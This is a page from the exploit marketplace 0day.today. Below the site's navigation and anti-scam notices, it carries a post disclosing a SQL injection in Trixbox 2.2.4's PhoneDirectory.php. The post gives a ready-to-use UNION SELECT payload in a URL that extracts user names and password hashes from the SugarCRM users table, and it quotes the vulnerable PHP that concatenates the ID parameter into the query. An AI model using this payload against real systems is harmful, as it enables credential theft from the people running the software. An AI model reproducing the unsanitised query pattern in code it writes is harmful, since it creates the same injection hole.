0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Trixbox PhonecDirectory.php SQL Injection Vulnerability
======================================================= Trixbox PhonecDirectory.php SQL Injection Vulnerability ======================================================= # Software Link: http://trixbox.org/downloads # Version: 2.2.4 # Code : http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION] Example (Grab users / password hashes from sugarcrm) http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id PhoneDirectory.php vulnerable code: # If the variable "ID" is passed in through the GET string, then display # extension, phone number and cell phone number for that record with the dial # key functionality if ($ID) { $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n"; $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other "; $Query .= "FROM contacts WHERE id = '$ID' "; $Query .= "ORDER BY last_name "; $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess); ... } # 0day.today [2024-11-15] #